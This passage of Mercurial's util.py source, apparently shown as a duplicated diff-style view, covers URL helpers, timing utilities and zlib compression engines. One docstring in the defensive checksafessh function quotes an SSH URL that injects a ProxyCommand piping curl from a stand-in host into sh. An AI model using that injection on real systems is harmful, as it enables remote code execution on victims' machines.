3009 def urllocalpath(path):
3010 return url(path, parsequery=False, parsefragment=False).localpath()
3010 return url(path, parsequery=False, parsefragment=False).localpath()
3011
3011
3012 def checksafessh(path):
3012 def checksafessh(path):
3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014
3014
3015 This is a sanity check for ssh urls. ssh will parse the first item as
3015 This is a sanity check for ssh urls. ssh will parse the first item as
3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 Let's prevent these potentially exploited urls entirely and warn the
3017 Let's prevent these potentially exploited urls entirely and warn the
3018 user.
3018 user.
3019
3019
3020 Raises an error.Abort when the url is unsafe.
3020 Raises an error.Abort when the url is unsafe.
3021 """
3021 """
3022 path = urlreq.unquote(path)
3022 path = urlreq.unquote(path)
3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 raise error.Abort(_('potentially unsafe url: %r') %
3024 raise error.Abort(_('potentially unsafe url: %r') %
3025 (path,))
3025 (path,))
3026
3026
3027 def hidepassword(u):
3027 def hidepassword(u):
3028 '''hide user credential in a url string'''
3028 '''hide user credential in a url string'''
3029 u = url(u)
3029 u = url(u)
3030 if u.passwd:
3030 if u.passwd:
3031 u.passwd = '***'
3031 u.passwd = '***'
3032 return bytes(u)
3032 return bytes(u)
3033
3033
3034 def removeauth(u):
3034 def removeauth(u):
3035 '''remove all authentication information from a url string'''
3035 '''remove all authentication information from a url string'''
3036 u = url(u)
3036 u = url(u)
3037 u.user = u.passwd = None
3037 u.user = u.passwd = None
3038 return str(u)
3038 return str(u)
3039
3039
3040 timecount = unitcountfn(
3040 timecount = unitcountfn(
3041 (1, 1e3, _('%.0f s')),
3041 (1, 1e3, _('%.0f s')),
3042 (100, 1, _('%.1f s')),
3042 (100, 1, _('%.1f s')),
3043 (10, 1, _('%.2f s')),
3043 (10, 1, _('%.2f s')),
3044 (1, 1, _('%.3f s')),
3044 (1, 1, _('%.3f s')),
3045 (100, 0.001, _('%.1f ms')),
3045 (100, 0.001, _('%.1f ms')),
3046 (10, 0.001, _('%.2f ms')),
3046 (10, 0.001, _('%.2f ms')),
3047 (1, 0.001, _('%.3f ms')),
3047 (1, 0.001, _('%.3f ms')),
3048 (100, 0.000001, _('%.1f us')),
3048 (100, 0.000001, _('%.1f us')),
3049 (10, 0.000001, _('%.2f us')),
3049 (10, 0.000001, _('%.2f us')),
3050 (1, 0.000001, _('%.3f us')),
3050 (1, 0.000001, _('%.3f us')),
3051 (100, 0.000000001, _('%.1f ns')),
3051 (100, 0.000000001, _('%.1f ns')),
3052 (10, 0.000000001, _('%.2f ns')),
3052 (10, 0.000000001, _('%.2f ns')),
3053 (1, 0.000000001, _('%.3f ns')),
3053 (1, 0.000000001, _('%.3f ns')),
3054 )
3054 )
3055
3055
3056 _timenesting = [0]
3056 _timenesting = [0]
3057
3057
3058 def timed(func):
3058 def timed(func):
3059 '''Report the execution time of a function call to stderr.
3059 '''Report the execution time of a function call to stderr.
3060
3060
3061 During development, use as a decorator when you need to measure
3061 During development, use as a decorator when you need to measure
3062 the cost of a function, e.g. as follows:
3062 the cost of a function, e.g. as follows:
3063
3063
3064 @util.timed
3064 @util.timed
3065 def foo(a, b, c):
3065 def foo(a, b, c):
3066 pass
3066 pass
3067 '''
3067 '''
3068
3068
3069 def wrapper(*args, **kwargs):
3069 def wrapper(*args, **kwargs):
3070 start = timer()
3070 start = timer()
3071 indent = 2
3071 indent = 2
3072 _timenesting[0] += indent
3072 _timenesting[0] += indent
3073 try:
3073 try:
3074 return func(*args, **kwargs)
3074 return func(*args, **kwargs)
3075 finally:
3075 finally:
3076 elapsed = timer() - start
3076 elapsed = timer() - start
3077 _timenesting[0] -= indent
3077 _timenesting[0] -= indent
3078 stderr.write('%s%s: %s\n' %
3078 stderr.write('%s%s: %s\n' %
3079 (' ' * _timenesting[0], func.__name__,
3079 (' ' * _timenesting[0], func.__name__,
3080 timecount(elapsed)))
3080 timecount(elapsed)))
3081 return wrapper
3081 return wrapper
3082
3082
3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085
3085
3086 def sizetoint(s):
3086 def sizetoint(s):
3087 '''Convert a space specifier to a byte count.
3087 '''Convert a space specifier to a byte count.
3088
3088
3089 >>> sizetoint(b'30')
3089 >>> sizetoint(b'30')
3090 30
3090 30
3091 >>> sizetoint(b'2.2kb')
3091 >>> sizetoint(b'2.2kb')
3092 2252
3092 2252
3093 >>> sizetoint(b'6M')
3093 >>> sizetoint(b'6M')
3094 6291456
3094 6291456
3095 '''
3095 '''
3096 t = s.strip().lower()
3096 t = s.strip().lower()
3097 try:
3097 try:
3098 for k, u in _sizeunits:
3098 for k, u in _sizeunits:
3099 if t.endswith(k):
3099 if t.endswith(k):
3100 return int(float(t[:-len(k)]) * u)
3100 return int(float(t[:-len(k)]) * u)
3101 return int(t)
3101 return int(t)
3102 except ValueError:
3102 except ValueError:
3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3104
3105 class hooks(object):
3105 class hooks(object):
3106 '''A collection of hook functions that can be used to extend a
3106 '''A collection of hook functions that can be used to extend a
3107 function's behavior. Hooks are called in lexicographic order,
3107 function's behavior. Hooks are called in lexicographic order,
3108 based on the names of their sources.'''
3108 based on the names of their sources.'''
3109
3109
3110 def __init__(self):
3110 def __init__(self):
3111 self._hooks = []
3111 self._hooks = []
3112
3112
3113 def add(self, source, hook):
3113 def add(self, source, hook):
3114 self._hooks.append((source, hook))
3114 self._hooks.append((source, hook))
3115
3115
3116 def __call__(self, *args):
3116 def __call__(self, *args):
3117 self._hooks.sort(key=lambda x: x[0])
3117 self._hooks.sort(key=lambda x: x[0])
3118 results = []
3118 results = []
3119 for source, hook in self._hooks:
3119 for source, hook in self._hooks:
3120 results.append(hook(*args))
3120 results.append(hook(*args))
3121 return results
3121 return results
3122
3122
3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 '''Yields lines for a nicely formatted stacktrace.
3124 '''Yields lines for a nicely formatted stacktrace.
3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 Each file+linenumber is formatted according to fileline.
3126 Each file+linenumber is formatted according to fileline.
3127 Each line is formatted according to line.
3127 Each line is formatted according to line.
3128 If line is None, it yields:
3128 If line is None, it yields:
3129 length of longest filepath+line number,
3129 length of longest filepath+line number,
3130 filepath+linenumber,
3130 filepath+linenumber,
3131 function
3131 function
3132
3132
3133 Not be used in production code but very convenient while developing.
3133 Not be used in production code but very convenient while developing.
3134 '''
3134 '''
3135 entries = [(fileline % (fn, ln), func)
3135 entries = [(fileline % (fn, ln), func)
3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 ][-depth:]
3137 ][-depth:]
3138 if entries:
3138 if entries:
3139 fnmax = max(len(entry[0]) for entry in entries)
3139 fnmax = max(len(entry[0]) for entry in entries)
3140 for fnln, func in entries:
3140 for fnln, func in entries:
3141 if line is None:
3141 if line is None:
3142 yield (fnmax, fnln, func)
3142 yield (fnmax, fnln, func)
3143 else:
3143 else:
3144 yield line % (fnmax, fnln, func)
3144 yield line % (fnmax, fnln, func)
3145
3145
3146 def debugstacktrace(msg='stacktrace', skip=0,
3146 def debugstacktrace(msg='stacktrace', skip=0,
3147 f=stderr, otherf=stdout, depth=0):
3147 f=stderr, otherf=stdout, depth=0):
3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 By default it will flush stdout first.
3150 By default it will flush stdout first.
3151 It can be used everywhere and intentionally does not require an ui object.
3151 It can be used everywhere and intentionally does not require an ui object.
3152 Not be used in production code but very convenient while developing.
3152 Not be used in production code but very convenient while developing.
3153 '''
3153 '''
3154 if otherf:
3154 if otherf:
3155 otherf.flush()
3155 otherf.flush()
3156 f.write('%s at:\n' % msg.rstrip())
3156 f.write('%s at:\n' % msg.rstrip())
3157 for line in getstackframes(skip + 1, depth=depth):
3157 for line in getstackframes(skip + 1, depth=depth):
3158 f.write(line)
3158 f.write(line)
3159 f.flush()
3159 f.flush()
3160
3160
3161 class dirs(object):
3161 class dirs(object):
3162 '''a multiset of directory names from a dirstate or manifest'''
3162 '''a multiset of directory names from a dirstate or manifest'''
3163
3163
3164 def __init__(self, map, skip=None):
3164 def __init__(self, map, skip=None):
3165 self._dirs = {}
3165 self._dirs = {}
3166 addpath = self.addpath
3166 addpath = self.addpath
3167 if safehasattr(map, 'iteritems') and skip is not None:
3167 if safehasattr(map, 'iteritems') and skip is not None:
3168 for f, s in map.iteritems():
3168 for f, s in map.iteritems():
3169 if s[0] != skip:
3169 if s[0] != skip:
3170 addpath(f)
3170 addpath(f)
3171 else:
3171 else:
3172 for f in map:
3172 for f in map:
3173 addpath(f)
3173 addpath(f)
3174
3174
3175 def addpath(self, path):
3175 def addpath(self, path):
3176 dirs = self._dirs
3176 dirs = self._dirs
3177 for base in finddirs(path):
3177 for base in finddirs(path):
3178 if base in dirs:
3178 if base in dirs:
3179 dirs[base] += 1
3179 dirs[base] += 1
3180 return
3180 return
3181 dirs[base] = 1
3181 dirs[base] = 1
3182
3182
3183 def delpath(self, path):
3183 def delpath(self, path):
3184 dirs = self._dirs
3184 dirs = self._dirs
3185 for base in finddirs(path):
3185 for base in finddirs(path):
3186 if dirs[base] > 1:
3186 if dirs[base] > 1:
3187 dirs[base] -= 1
3187 dirs[base] -= 1
3188 return
3188 return
3189 del dirs[base]
3189 del dirs[base]
3190
3190
3191 def __iter__(self):
3191 def __iter__(self):
3192 return iter(self._dirs)
3192 return iter(self._dirs)
3193
3193
3194 def __contains__(self, d):
3194 def __contains__(self, d):
3195 return d in self._dirs
3195 return d in self._dirs
3196
3196
3197 if safehasattr(parsers, 'dirs'):
3197 if safehasattr(parsers, 'dirs'):
3198 dirs = parsers.dirs
3198 dirs = parsers.dirs
3199
3199
3200 def finddirs(path):
3200 def finddirs(path):
3201 pos = path.rfind('/')
3201 pos = path.rfind('/')
3202 while pos != -1:
3202 while pos != -1:
3203 yield path[:pos]
3203 yield path[:pos]
3204 pos = path.rfind('/', 0, pos)
3204 pos = path.rfind('/', 0, pos)
3205
3205
3206 # compression code
3206 # compression code
3207
3207
3208 SERVERROLE = 'server'
3208 SERVERROLE = 'server'
3209 CLIENTROLE = 'client'
3209 CLIENTROLE = 'client'
3210
3210
3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 (u'name', u'serverpriority',
3212 (u'name', u'serverpriority',
3213 u'clientpriority'))
3213 u'clientpriority'))
3214
3214
3215 class compressormanager(object):
3215 class compressormanager(object):
3216 """Holds registrations of various compression engines.
3216 """Holds registrations of various compression engines.
3217
3217
3218 This class essentially abstracts the differences between compression
3218 This class essentially abstracts the differences between compression
3219 engines to allow new compression formats to be added easily, possibly from
3219 engines to allow new compression formats to be added easily, possibly from
3220 extensions.
3220 extensions.
3221
3221
3222 Compressors are registered against the global instance by calling its
3222 Compressors are registered against the global instance by calling its
3223 ``register()`` method.
3223 ``register()`` method.
3224 """
3224 """
3225 def __init__(self):
3225 def __init__(self):
3226 self._engines = {}
3226 self._engines = {}
3227 # Bundle spec human name to engine name.
3227 # Bundle spec human name to engine name.
3228 self._bundlenames = {}
3228 self._bundlenames = {}
3229 # Internal bundle identifier to engine name.
3229 # Internal bundle identifier to engine name.
3230 self._bundletypes = {}
3230 self._bundletypes = {}
3231 # Revlog header to engine name.
3231 # Revlog header to engine name.
3232 self._revlogheaders = {}
3232 self._revlogheaders = {}
3233 # Wire proto identifier to engine name.
3233 # Wire proto identifier to engine name.
3234 self._wiretypes = {}
3234 self._wiretypes = {}
3235
3235
3236 def __getitem__(self, key):
3236 def __getitem__(self, key):
3237 return self._engines[key]
3237 return self._engines[key]
3238
3238
3239 def __contains__(self, key):
3239 def __contains__(self, key):
3240 return key in self._engines
3240 return key in self._engines
3241
3241
3242 def __iter__(self):
3242 def __iter__(self):
3243 return iter(self._engines.keys())
3243 return iter(self._engines.keys())
3244
3244
3245 def register(self, engine):
3245 def register(self, engine):
3246 """Register a compression engine with the manager.
3246 """Register a compression engine with the manager.
3247
3247
3248 The argument must be a ``compressionengine`` instance.
3248 The argument must be a ``compressionengine`` instance.
3249 """
3249 """
3250 if not isinstance(engine, compressionengine):
3250 if not isinstance(engine, compressionengine):
3251 raise ValueError(_('argument must be a compressionengine'))
3251 raise ValueError(_('argument must be a compressionengine'))
3252
3252
3253 name = engine.name()
3253 name = engine.name()
3254
3254
3255 if name in self._engines:
3255 if name in self._engines:
3256 raise error.Abort(_('compression engine %s already registered') %
3256 raise error.Abort(_('compression engine %s already registered') %
3257 name)
3257 name)
3258
3258
3259 bundleinfo = engine.bundletype()
3259 bundleinfo = engine.bundletype()
3260 if bundleinfo:
3260 if bundleinfo:
3261 bundlename, bundletype = bundleinfo
3261 bundlename, bundletype = bundleinfo
3262
3262
3263 if bundlename in self._bundlenames:
3263 if bundlename in self._bundlenames:
3264 raise error.Abort(_('bundle name %s already registered') %
3264 raise error.Abort(_('bundle name %s already registered') %
3265 bundlename)
3265 bundlename)
3266 if bundletype in self._bundletypes:
3266 if bundletype in self._bundletypes:
3267 raise error.Abort(_('bundle type %s already registered by %s') %
3267 raise error.Abort(_('bundle type %s already registered by %s') %
3268 (bundletype, self._bundletypes[bundletype]))
3268 (bundletype, self._bundletypes[bundletype]))
3269
3269
3270 # No external facing name declared.
3270 # No external facing name declared.
3271 if bundlename:
3271 if bundlename:
3272 self._bundlenames[bundlename] = name
3272 self._bundlenames[bundlename] = name
3273
3273
3274 self._bundletypes[bundletype] = name
3274 self._bundletypes[bundletype] = name
3275
3275
3276 wiresupport = engine.wireprotosupport()
3276 wiresupport = engine.wireprotosupport()
3277 if wiresupport:
3277 if wiresupport:
3278 wiretype = wiresupport.name
3278 wiretype = wiresupport.name
3279 if wiretype in self._wiretypes:
3279 if wiretype in self._wiretypes:
3280 raise error.Abort(_('wire protocol compression %s already '
3280 raise error.Abort(_('wire protocol compression %s already '
3281 'registered by %s') %
3281 'registered by %s') %
3282 (wiretype, self._wiretypes[wiretype]))
3282 (wiretype, self._wiretypes[wiretype]))
3283
3283
3284 self._wiretypes[wiretype] = name
3284 self._wiretypes[wiretype] = name
3285
3285
3286 revlogheader = engine.revlogheader()
3286 revlogheader = engine.revlogheader()
3287 if revlogheader and revlogheader in self._revlogheaders:
3287 if revlogheader and revlogheader in self._revlogheaders:
3288 raise error.Abort(_('revlog header %s already registered by %s') %
3288 raise error.Abort(_('revlog header %s already registered by %s') %
3289 (revlogheader, self._revlogheaders[revlogheader]))
3289 (revlogheader, self._revlogheaders[revlogheader]))
3290
3290
3291 if revlogheader:
3291 if revlogheader:
3292 self._revlogheaders[revlogheader] = name
3292 self._revlogheaders[revlogheader] = name
3293
3293
3294 self._engines[name] = engine
3294 self._engines[name] = engine
3295
3295
3296 @property
3296 @property
3297 def supportedbundlenames(self):
3297 def supportedbundlenames(self):
3298 return set(self._bundlenames.keys())
3298 return set(self._bundlenames.keys())
3299
3299
3300 @property
3300 @property
3301 def supportedbundletypes(self):
3301 def supportedbundletypes(self):
3302 return set(self._bundletypes.keys())
3302 return set(self._bundletypes.keys())
3303
3303
3304 def forbundlename(self, bundlename):
3304 def forbundlename(self, bundlename):
3305 """Obtain a compression engine registered to a bundle name.
3305 """Obtain a compression engine registered to a bundle name.
3306
3306
3307 Will raise KeyError if the bundle type isn't registered.
3307 Will raise KeyError if the bundle type isn't registered.
3308
3308
3309 Will abort if the engine is known but not available.
3309 Will abort if the engine is known but not available.
3310 """
3310 """
3311 engine = self._engines[self._bundlenames[bundlename]]
3311 engine = self._engines[self._bundlenames[bundlename]]
3312 if not engine.available():
3312 if not engine.available():
3313 raise error.Abort(_('compression engine %s could not be loaded') %
3313 raise error.Abort(_('compression engine %s could not be loaded') %
3314 engine.name())
3314 engine.name())
3315 return engine
3315 return engine
3316
3316
3317 def forbundletype(self, bundletype):
3317 def forbundletype(self, bundletype):
3318 """Obtain a compression engine registered to a bundle type.
3318 """Obtain a compression engine registered to a bundle type.
3319
3319
3320 Will raise KeyError if the bundle type isn't registered.
3320 Will raise KeyError if the bundle type isn't registered.
3321
3321
3322 Will abort if the engine is known but not available.
3322 Will abort if the engine is known but not available.
3323 """
3323 """
3324 engine = self._engines[self._bundletypes[bundletype]]
3324 engine = self._engines[self._bundletypes[bundletype]]
3325 if not engine.available():
3325 if not engine.available():
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3327 engine.name())
3327 engine.name())
3328 return engine
3328 return engine
3329
3329
3330 def supportedwireengines(self, role, onlyavailable=True):
3330 def supportedwireengines(self, role, onlyavailable=True):
3331 """Obtain compression engines that support the wire protocol.
3331 """Obtain compression engines that support the wire protocol.
3332
3332
3333 Returns a list of engines in prioritized order, most desired first.
3333 Returns a list of engines in prioritized order, most desired first.
3334
3334
3335 If ``onlyavailable`` is set, filter out engines that can't be
3335 If ``onlyavailable`` is set, filter out engines that can't be
3336 loaded.
3336 loaded.
3337 """
3337 """
3338 assert role in (SERVERROLE, CLIENTROLE)
3338 assert role in (SERVERROLE, CLIENTROLE)
3339
3339
3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341
3341
3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 if onlyavailable:
3343 if onlyavailable:
3344 engines = [e for e in engines if e.available()]
3344 engines = [e for e in engines if e.available()]
3345
3345
3346 def getkey(e):
3346 def getkey(e):
3347 # Sort first by priority, highest first. In case of tie, sort
3347 # Sort first by priority, highest first. In case of tie, sort
3348 # alphabetically. This is arbitrary, but ensures output is
3348 # alphabetically. This is arbitrary, but ensures output is
3349 # stable.
3349 # stable.
3350 w = e.wireprotosupport()
3350 w = e.wireprotosupport()
3351 return -1 * getattr(w, attr), w.name
3351 return -1 * getattr(w, attr), w.name
3352
3352
3353 return list(sorted(engines, key=getkey))
3353 return list(sorted(engines, key=getkey))
3354
3354
3355 def forwiretype(self, wiretype):
3355 def forwiretype(self, wiretype):
3356 engine = self._engines[self._wiretypes[wiretype]]
3356 engine = self._engines[self._wiretypes[wiretype]]
3357 if not engine.available():
3357 if not engine.available():
3358 raise error.Abort(_('compression engine %s could not be loaded') %
3358 raise error.Abort(_('compression engine %s could not be loaded') %
3359 engine.name())
3359 engine.name())
3360 return engine
3360 return engine
3361
3361
3362 def forrevlogheader(self, header):
3362 def forrevlogheader(self, header):
3363 """Obtain a compression engine registered to a revlog header.
3363 """Obtain a compression engine registered to a revlog header.
3364
3364
3365 Will raise KeyError if the revlog header value isn't registered.
3365 Will raise KeyError if the revlog header value isn't registered.
3366 """
3366 """
3367 return self._engines[self._revlogheaders[header]]
3367 return self._engines[self._revlogheaders[header]]
3368
3368
3369 compengines = compressormanager()
3369 compengines = compressormanager()
3370
3370
3371 class compressionengine(object):
3371 class compressionengine(object):
3372 """Base class for compression engines.
3372 """Base class for compression engines.
3373
3373
3374 Compression engines must implement the interface defined by this class.
3374 Compression engines must implement the interface defined by this class.
3375 """
3375 """
3376 def name(self):
3376 def name(self):
3377 """Returns the name of the compression engine.
3377 """Returns the name of the compression engine.
3378
3378
3379 This is the key the engine is registered under.
3379 This is the key the engine is registered under.
3380
3380
3381 This method must be implemented.
3381 This method must be implemented.
3382 """
3382 """
3383 raise NotImplementedError()
3383 raise NotImplementedError()
3384
3384
3385 def available(self):
3385 def available(self):
3386 """Whether the compression engine is available.
3386 """Whether the compression engine is available.
3387
3387
3388 The intent of this method is to allow optional compression engines
3388 The intent of this method is to allow optional compression engines
3389 that may not be available in all installations (such as engines relying
3389 that may not be available in all installations (such as engines relying
3390 on C extensions that may not be present).
3390 on C extensions that may not be present).
3391 """
3391 """
3392 return True
3392 return True
3393
3393
3394 def bundletype(self):
3394 def bundletype(self):
3395 """Describes bundle identifiers for this engine.
3395 """Describes bundle identifiers for this engine.
3396
3396
3397 If this compression engine isn't supported for bundles, returns None.
3397 If this compression engine isn't supported for bundles, returns None.
3398
3398
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 the user-facing "bundle spec" compression name and an internal
3400 the user-facing "bundle spec" compression name and an internal
3401 identifier used to denote the compression format within bundles. To
3401 identifier used to denote the compression format within bundles. To
3402 exclude the name from external usage, set the first element to ``None``.
3402 exclude the name from external usage, set the first element to ``None``.
3403
3403
3404 If bundle compression is supported, the class must also implement
3404 If bundle compression is supported, the class must also implement
3405 ``compressstream`` and `decompressorreader``.
3405 ``compressstream`` and `decompressorreader``.
3406
3406
3407 The docstring of this method is used in the help system to tell users
3407 The docstring of this method is used in the help system to tell users
3408 about this engine.
3408 about this engine.
3409 """
3409 """
3410 return None
3410 return None
3411
3411
3412 def wireprotosupport(self):
3412 def wireprotosupport(self):
3413 """Declare support for this compression format on the wire protocol.
3413 """Declare support for this compression format on the wire protocol.
3414
3414
3415 If this compression engine isn't supported for compressing wire
3415 If this compression engine isn't supported for compressing wire
3416 protocol payloads, returns None.
3416 protocol payloads, returns None.
3417
3417
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 fields:
3419 fields:
3420
3420
3421 * String format identifier
3421 * String format identifier
3422 * Integer priority for the server
3422 * Integer priority for the server
3423 * Integer priority for the client
3423 * Integer priority for the client
3424
3424
3425 The integer priorities are used to order the advertisement of format
3425 The integer priorities are used to order the advertisement of format
3426 support by server and client. The highest integer is advertised
3426 support by server and client. The highest integer is advertised
3427 first. Integers with non-positive values aren't advertised.
3427 first. Integers with non-positive values aren't advertised.
3428
3428
3429 The priority values are somewhat arbitrary and only used for default
3429 The priority values are somewhat arbitrary and only used for default
3430 ordering. The relative order can be changed via config options.
3430 ordering. The relative order can be changed via config options.
3431
3431
3432 If wire protocol compression is supported, the class must also implement
3432 If wire protocol compression is supported, the class must also implement
3433 ``compressstream`` and ``decompressorreader``.
3433 ``compressstream`` and ``decompressorreader``.
3434 """
3434 """
3435 return None
3435 return None
3436
3436
3437 def revlogheader(self):
3437 def revlogheader(self):
3438 """Header added to revlog chunks that identifies this engine.
3438 """Header added to revlog chunks that identifies this engine.
3439
3439
3440 If this engine can be used to compress revlogs, this method should
3440 If this engine can be used to compress revlogs, this method should
3441 return the bytes used to identify chunks compressed with this engine.
3441 return the bytes used to identify chunks compressed with this engine.
3442 Else, the method should return ``None`` to indicate it does not
3442 Else, the method should return ``None`` to indicate it does not
3443 participate in revlog compression.
3443 participate in revlog compression.
3444 """
3444 """
3445 return None
3445 return None
3446
3446
3447 def compressstream(self, it, opts=None):
3447 def compressstream(self, it, opts=None):
3448 """Compress an iterator of chunks.
3448 """Compress an iterator of chunks.
3449
3449
3450 The method receives an iterator (ideally a generator) of chunks of
3450 The method receives an iterator (ideally a generator) of chunks of
3451 bytes to be compressed. It returns an iterator (ideally a generator)
3451 bytes to be compressed. It returns an iterator (ideally a generator)
3452 of bytes of chunks representing the compressed output.
3452 of bytes of chunks representing the compressed output.
3453
3453
3454 Optionally accepts an argument defining how to perform compression.
3454 Optionally accepts an argument defining how to perform compression.
3455 Each engine treats this argument differently.
3455 Each engine treats this argument differently.
3456 """
3456 """
3457 raise NotImplementedError()
3457 raise NotImplementedError()
3458
3458
3459 def decompressorreader(self, fh):
3459 def decompressorreader(self, fh):
3460 """Perform decompression on a file object.
3460 """Perform decompression on a file object.
3461
3461
3462 Argument is an object with a ``read(size)`` method that returns
3462 Argument is an object with a ``read(size)`` method that returns
3463 compressed data. Return value is an object with a ``read(size)`` that
3463 compressed data. Return value is an object with a ``read(size)`` that
3464 returns uncompressed data.
3464 returns uncompressed data.
3465 """
3465 """
3466 raise NotImplementedError()
3466 raise NotImplementedError()
3467
3467
3468 def revlogcompressor(self, opts=None):
3468 def revlogcompressor(self, opts=None):
3469 """Obtain an object that can be used to compress revlog entries.
3469 """Obtain an object that can be used to compress revlog entries.
3470
3470
3471 The object has a ``compress(data)`` method that compresses binary
3471 The object has a ``compress(data)`` method that compresses binary
3472 data. This method returns compressed binary data or ``None`` if
3472 data. This method returns compressed binary data or ``None`` if
3473 the data could not be compressed (too small, not compressible, etc).
3473 the data could not be compressed (too small, not compressible, etc).
3474 The returned data should have a header uniquely identifying this
3474 The returned data should have a header uniquely identifying this
3475 compression format so decompression can be routed to this engine.
3475 compression format so decompression can be routed to this engine.
3476 This header should be identified by the ``revlogheader()`` return
3476 This header should be identified by the ``revlogheader()`` return
3477 value.
3477 value.
3478
3478
3479 The object has a ``decompress(data)`` method that decompresses
3479 The object has a ``decompress(data)`` method that decompresses
3480 data. The method will only be called if ``data`` begins with
3480 data. The method will only be called if ``data`` begins with
3481 ``revlogheader()``. The method should return the raw, uncompressed
3481 ``revlogheader()``. The method should return the raw, uncompressed
3482 data or raise a ``RevlogError``.
3482 data or raise a ``RevlogError``.
3483
3483
3484 The object is reusable but is not thread safe.
3484 The object is reusable but is not thread safe.
3485 """
3485 """
3486 raise NotImplementedError()
3486 raise NotImplementedError()
3487
3487
3488 class _zlibengine(compressionengine):
3488 class _zlibengine(compressionengine):
3489 def name(self):
3489 def name(self):
3490 return 'zlib'
3490 return 'zlib'
3491
3491
3492 def bundletype(self):
3492 def bundletype(self):
3493 """zlib compression using the DEFLATE algorithm.
3493 """zlib compression using the DEFLATE algorithm.
3494
3494
3495 All Mercurial clients should support this format. The compression
3495 All Mercurial clients should support this format. The compression
3496 algorithm strikes a reasonable balance between compression ratio
3496 algorithm strikes a reasonable balance between compression ratio
3497 and size.
3497 and size.
3498 """
3498 """
3499 return 'gzip', 'GZ'
3499 return 'gzip', 'GZ'
3500
3500
3501 def wireprotosupport(self):
3501 def wireprotosupport(self):
3502 return compewireprotosupport('zlib', 20, 20)
3502 return compewireprotosupport('zlib', 20, 20)
3503
3503
3504 def revlogheader(self):
3504 def revlogheader(self):
3505 return 'x'
3505 return 'x'
3506
3506
3507 def compressstream(self, it, opts=None):
3507 def compressstream(self, it, opts=None):
3508 opts = opts or {}
3508 opts = opts or {}
3509
3509
3510 z = zlib.compressobj(opts.get('level', -1))
3510 z = zlib.compressobj(opts.get('level', -1))
3511 for chunk in it:
3511 for chunk in it:
3512 data = z.compress(chunk)
3512 data = z.compress(chunk)
3513 # Not all calls to compress emit data. It is cheaper to inspect
3513 # Not all calls to compress emit data. It is cheaper to inspect
3514 # here than to feed empty chunks through generator.
3514 # here than to feed empty chunks through generator.
3515 if data:
3515 if data:
3516 yield data
3516 yield data
3517
3517
3518 yield z.flush()
3518 yield z.flush()
3519
3519
3520 def decompressorreader(self, fh):
3520 def decompressorreader(self, fh):
3521 def gen():
3521 def gen():
3522 d = zlib.decompressobj()
3522 d = zlib.decompressobj()
3523 for chunk in filechunkiter(fh):
3523 for chunk in filechunkiter(fh):
3524 while chunk:
3524 while chunk:
3525 # Limit output size to limit memory.
3525 # Limit output size to limit memory.
3526 yield d.decompress(chunk, 2 ** 18)
3526 yield d.decompress(chunk, 2 ** 18)
3527 chunk = d.unconsumed_tail
3527 chunk = d.unconsumed_tail
3528
3528
3529 return chunkbuffer(gen())
3529 return chunkbuffer(gen())
3530
3530
3531 class zlibrevlogcompressor(object):
3531 class zlibrevlogcompressor(object):
3532 def compress(self, data):
3532 def compress(self, data):
3533 insize = len(data)
3533 insize = len(data)
3534 # Caller handles empty input case.
3534 # Caller handles empty input case.
3535 assert insize > 0
3535 assert insize > 0
3536
3536
3537 if insize < 44:
3537 if insize < 44:
3538 return None
3538 return None
3539
3539
3540 elif insize <= 1000000:
3540 elif insize <= 1000000:
3541 compressed = zlib.compress(data)
3541 compressed = zlib.compress(data)
3542 if len(compressed) < insize:
3542 if len(compressed) < insize:
3543 return compressed
3543 return compressed
3544 return None
3544 return None
3545
3545
3546 # zlib makes an internal copy of the input buffer, doubling
3546 # zlib makes an internal copy of the input buffer, doubling
3547 # memory usage for large inputs. So do streaming compression
3547 # memory usage for large inputs. So do streaming compression
3548 # on large inputs.
3548 # on large inputs.
3549 else:
3549 else:
3550 z = zlib.compressobj()
3550 z = zlib.compressobj()
3551 parts = []
3551 parts = []
3552 pos = 0
3552 pos = 0
3553 while pos < insize:
3553 while pos < insize:
3554 pos2 = pos + 2**20
3554 pos2 = pos + 2**20
3555 parts.append(z.compress(data[pos:pos2]))
3555 parts.append(z.compress(data[pos:pos2]))
3556 pos = pos2
3556 pos = pos2
3557 parts.append(z.flush())
3557 parts.append(z.flush())
3558
3558
3559 if sum(map(len, parts)) < insize:
3559 if sum(map(len, parts)) < insize:
3560 return ''.join(parts)
3560 return ''.join(parts)
3561 return None
3561 return None
3562
3562
3563 def decompress(self, data):
